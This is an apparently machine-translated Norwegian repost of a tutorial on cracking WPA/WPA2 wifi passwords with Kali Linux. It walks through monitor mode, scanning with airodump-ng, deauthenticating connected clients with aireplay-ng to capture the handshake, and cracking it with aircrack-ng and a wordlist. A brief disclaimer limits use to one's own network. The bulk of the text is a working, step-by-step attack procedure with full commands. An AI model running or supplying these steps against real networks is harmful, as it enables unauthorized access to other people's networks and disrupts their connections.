Maybaygiare.org

Blog Network

GeeksforGeeks

«Hacking Wifi» høres veldig kult og interessant. Men faktisk hacking wifi praktisk talt er mye enklere med en god ordliste. Men denne verdenslisten er ikke til nytte før vi ikke har noen ide om hvordan vi faktisk bruker ordlisten for å knekke en hash. Og før sprengning hash vi faktisk trenger å generere den. Så, nedenfor er disse trinnene sammen med noen gode ordlister å knekke EN WPA / WPA2 wifi.

Merk: Bruk metodene nedenfor bare for pedagogiske / testformål på egen wifi eller med tillatelse fra eieren. Ikke bruk dette til ondsinnede formål.

så, start Opp Kali Linux. Åpne terminalvinduet. Og utfør følgende trinn.Trinn 1: ifconfig ( grensesnittkonfigurasjon): for å vise eller endre konfigurasjonen av nettverksgrensesnittene på systemet.

ifconfig

ifconfig-linux-grensesnitt-konfigurasjon

her,

  • eth0 : Første Ethernet-grensesnitt
  • l0 : Loopback grensesnitt
  • wlan0 : første trådløse nettverksgrensesnitt på systemet. (Dette er det vi trenger.)

Trinn 2: Stopp gjeldende prosesser som bruker WiFi-grensesnittet.

airmon-ng check kill

stopp-prosess-som-bruker-wifi-linux

Trinn 3: for å starte wlan0 i skjermmodus.

airmon-ng start wlan0

start-grensesnitt-linux

Trinn 4: for å vise Alle Wifi-nettverkene rundt deg.

airodump-ng wlan0mon

vis-alle-wifi-nettverk

Her,

  • airodump-ng : for pakkeopptak
  • wlan0mon : Navnet på grensesnittet (dette navnet kan være forskjellig på de forskjellige enhetene)

Trykk Ctrl + C for å stoppe prosessen når du har funnet målnettverket.

Trinn 5: for å vise klientene som er koblet til målnettverket.

airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w /root wlan0mon

vis-tilkoblede-klienter-til-mål

her

  • airodump-ng : for pakkeopptak
  • -C : Kanal
  • –bssid : MAC-adressen til et trådløst tilgangspunkt(WAP).
  • – w: Katalogen der du vil lagre filen (Passordfil).
  • wlan0mon: navn på grensesnittet.

Trinn 6: Åpne et nytt terminalvindu for å koble fra klientene som er koblet til målnettverket.

aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon

koble fra-klienter-tilkoblet-til-mål

  • aireplay-ng : for å injisere rammer
  • -0 : for deautentisering
  • 10 : Nei. av deauthentication pakker som skal sendes
  • -a : for bssid av målnettverket
  • wlan0mon: navn på grensesnittet.

når klienten er koblet fra målnettverket. Han prøver å koble til nettverket igjen, og når han gjør det, får du NOE som heter WPA-håndtrykk i det forrige vinduet på terminalen.

fange-WPA-håndtrykk

Nå er vi ferdige med å fange pakkene. Så nå kan du lukke terminalvinduet.

Trinn 7. For å dekryptere passordet. Åpne Filer-programmet.

for å dekryptere-passord-fra-håndtrykk

her,

  • hacking-01.cap er filen du trenger.
    aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap
  • aircrack-ng : 802.11 wep og WPA-psk nøkler sprengning program
  • -a: – a2 FOR WPA2 & – a FOR wpa nettverk
  • -b : BSSID av målnett
  • -w : Plassering av ordlistefilen
  • /root / hacking-01.cap: Plassering av cap-filen

du kan laste ned filen med vanlige passord fra internett, og hvis du vil lage din egen fil, kan du bruke crunch-verktøyet
wifi-password-cracked

Artikkel Tags:

Legg igjen en kommentar

Din e-postadresse vil ikke bli publisert.